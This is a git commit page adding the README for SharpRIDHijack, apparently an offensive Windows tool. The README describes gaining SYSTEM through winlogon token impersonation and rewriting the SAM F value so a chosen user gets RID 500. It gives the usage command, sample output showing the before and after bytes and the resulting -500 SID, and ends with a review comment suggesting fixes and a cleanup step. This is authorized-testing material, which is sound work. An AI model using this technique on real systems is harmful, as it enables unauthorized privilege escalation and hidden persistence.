author: heqnx <root@heqnx.com> 2025-04-25 13:39:58 +0300
committer: heqnx <root@heqnx.com> 2025-04-25 13:39:58 +0300
commit: 8257b544588a7a1d37698f2d2efb885967c8d313 (patch)
tree: 836171f93719f85b50eebca441211693e0441557 /README.md
parent: 47d070f274393a9ce87657d82dc8cbcb79dda5a8 (diff)
download: SharpRIDHijack-8257b544588a7a1d37698f2d2efb885967c8d313.tar.gz
SharpRIDHijack-8257b544588a7a1d37698f2d2efb885967c8d313.zip
initial commit
Diffstat (limited to 'README.md')
-rw-r--r-- README.md 123
1 files changed, 123 insertions, 0 deletions
diff --git a/README.md b/README.md
new file mode 100644
index 0000000..7c9042c
--- /dev/null
+++ b/README.md
@@ -0,0 +1,123 @@
+# SharpRIDHijack
+
+`SharpRIDHijack` is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and modifying the SAM registry to assign an administrative RID to a specified user account. The tool supports both command-line and installer-based execution.
+
+> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system.
+
+## Features
+
+- **Privilege Escalation**: Escalates to SYSTEM by impersonating the winlogon process token.
+- **RID Hijacking**: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user.
+
+## Installation
+
+### Prerequisites
+
+- **.NET Framework**: Version 4.7.2 or later.
+- **Visual Studio or MSBuild**: For compiling the C# source code.
+- **Git**: To clone the repository.
+- **Windows**: Compatible with Windows 10/11 (other versions may require offset adjustments for SAM registry).
+
+### Steps
+
+- Clone the repository:
+
+```
+PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git
+PS C:\> cd SharpRIDHijack
+```
+
+- Compile the source code with Visual Studio by opening `SharpRIDHijack.sln`
+
+- Alternatively, compile with MSBuild:
+
+```
+PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj
+```
+
+## Usage
+
+### Command-Line Flags
+
+- Run SharpRIDHijack.exe with a target username to perform RID hijacking. The tool requires administrative privileges.
+
+```
+PS C:\> Usage: SharpRIDHijack.exe <username>
+```
+
+## Examples
+
+### Perform RID Hijacking via Command-Line
+
+- Hijack the RID of the `lowpriv` user to grant administrative privileges:
+
+```
+PS C:\> SharpRIDHijack.exe lowpriv
+[inf] SeDebugPrivilege enabled
+[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM
+[inf] Original RID: 000003EB (1003)
+[inf] Original F value:
+03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
+[inf] Found RID 1003 at offset 48
+[inf] New F value:
+03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00
+```
+
+- Note the user is explicitly in the administrators group when checking with `net user`:
+
+```
+PS C:\> net user lowpriv
+User name lowpriv
+
+...
+
+Local Group Memberships *Users
+Global Group memberships *None
+The command completed successfully.
+```
+
+- User does show up with an administrator SID and associated privileges:
+
+```
+PS C:\> whoami /user
+
+USER INFORMATION
+----------------
+
+User Name SID
+======================= ============================================
+DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500
+
+PS C:\> whoami /priv
+
+PRIVILEGES INFORMATION
+----------------------
+
+Privilege Name Description State
+========================================= ================================================================== ========
+...
+SeRestorePrivilege Restore files and directories Disabled
+SeDebugPrivilege Debug programs Enabled
+SeSystemEnvironmentPrivilege Modify firmware environment values Disabled
+SeChangeNotifyPrivilege Bypass traverse checking Enabled
+...
+SeImpersonatePrivilege Impersonate a client after authentication Enabled
+SeCreateGlobalPrivilege Create global objects Enabled
+SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
+...
+```
+
+
+## Automated Releases
+
+Check the GitHub Releases page for the new release with attached binaries.
+
+## License
+
+This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details.
+
+## Disclaimer
+
+`SharpRIDHijack` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments.
+
+
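Review bot: the sentence introducing the `net user` example reads "Note the user is explicitly in the administrators group", but the output directly under it shows `Local Group Memberships *Users` with no Administrators entry, so the text states the opposite of what the listing shows; the point being made (and the reason the `whoami /user` example follows with a SID ending in `-500`) is that the account is not a member of the Administrators group even though it now carries the administrator RID, so reword it to "Note the user is not explicitly in the Administrators group when checking with `net user`". Two smaller points in the same hunk: the usage block `PS C:\> Usage: SharpRIDHijack.exe <username>` puts a PowerShell prompt in front of what is the program's printed usage string rather than a command, so drop the `PS C:\>` prefix there; and since the tool logs the "Original F value" but the README never says how the modification is undone, add a short cleanup section telling the tester to restore that original F value after an engagement, since leaving a non-admin account with RID 500 in the SAM is exactly the persistence condition a defender would be looking for.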